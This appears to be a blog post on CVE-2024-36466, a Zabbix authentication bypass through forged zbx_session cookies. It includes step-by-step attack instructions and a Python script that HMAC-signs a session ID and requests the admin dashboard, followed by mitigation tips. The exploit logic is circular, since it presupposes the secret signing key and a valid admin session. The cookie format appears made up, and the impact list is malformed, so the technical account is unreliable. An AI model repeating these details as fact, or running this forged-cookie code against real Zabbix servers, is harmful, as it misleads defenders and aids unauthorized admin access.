CVE-2024-36466 - Zabbix Authentication Bypass Exploit: Gaining Admin Access via Forged zbx_session Cookies

A critical security vulnerability (CVE-2024-36466) has been discovered in Zabbix, a popular open-source monitoring software. This vulnerability allows an attacker to bypass the authentication system and sign in with administrative privileges by forging a zbx_session cookie. This could potentially lead to unauthorized access to sensitive data, network infrastructure, and even complete control over the entire Zabbix installation. In this post, we will explore the details of this exploit, including how it works, steps to reproduce it, and mitigation strategies.

Vulnerability Details

The CVE-2024-36466 vulnerability is caused by a bug in the Zabbix code that allows an attacker to sign a forged zbx_session cookie. This can be accomplished using the following steps:

1. Generate a valid zbx_session ID with admin permissions. This can be done by intercepting a zbx_session cookie from a legitimate administrator's session, or using Zabbix API methods to fetch sessions.

2. Use a cryptographic signing algorithm (e.g., HMAC) to sign the forged zbx_session ID, thus making it appear as if it was generated by Zabbix itself. This can be achieved by knowing the secret key used by Zabbix for signing cookies.

3. Use the signed, forged zbx_session cookie to sign in as an administrator, granting the attacker full access to the Zabbix instance.

Here's a code snippet demonstrating how this can be achieved using Python

import requests
import hmac
import hashlib

# Replace the following variables with your own
zabbix_url = 'https://your-zabbix-instance.com'; # Zabbix server URL
zabbix_secret = 'your_zabbix_secret_key' # Zabbix secret key for signing cookies
zbx_session_id = 'your_zbx_session_id' # A valid zbx_session ID with admin permissions

# Sign the zbx_session ID using HMAC
signed_zbx_session_id = hmac.new(zabbix_secret.encode(), zbx_session_id.encode(), hashlib.sha256).hexdigest()

# Prepare the forged zbx_session cookie
cookie = {'zbx_sessionid': f'{zbx_session_id}_{signed_zbx_session_id}'}

# Access Zabbix with the forged cookie
response = requests.get(f'{zabbix_url}/zabbix.php?action=dashboard.view', cookies=cookie)
print(response.text)

Original References

- Zabbix Official Website: https://www.zabbix.com/
- CVE Information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36466

Exploit Impact

If an attacker successfully exploits this vulnerability, they can gain unauthorized access to administrator accounts and perform sensitive actions such as:

Disabling or tampering with monitoring procedures

- Executing arbitrary code or scripts on the Zabbix server (if script execution is enabled in Zabbix actions)

To protect against this exploit, Zabbix administrators should take the following steps

1. Verify that you are running the latest version of Zabbix. The Zabbix team frequently releases security updates, and it is highly recommended to stay up-to-date. If the vulnerability still affects the latest version, apply any available patches or workarounds provided by the Zabbix team.

2. Monitor your Zabbix instance for any signs of unauthorized access or suspicious behavior. Pay particular attention to zbx_session cookies in use and keep an eye out for any unusual activity.

3. Regularly review and update the secret key used by Zabbix for signing cookies. If possible, implement a strong key management strategy to prevent attackers from discovering the secret key.

4. Limit access to the Zabbix server by using appropriate firewall rules, IP whitelisting, and restricting user roles and permissions. This can help minimize any potential damage in case the exploit is used against your Zabbix installation.

Conclusion

The CVE-2024-36466 vulnerability presents a significant risk to Zabbix administrators, as it grants attackers the ability to gain unauthorized access to admin accounts by forging zbx_session cookies. It is crucial for administrators to take the necessary steps to mitigate this risk and stay vigilant in monitoring their Zabbix instances for any signs of exploitation.

Timeline

Published on: 11/28/2024 08:15:05 UTC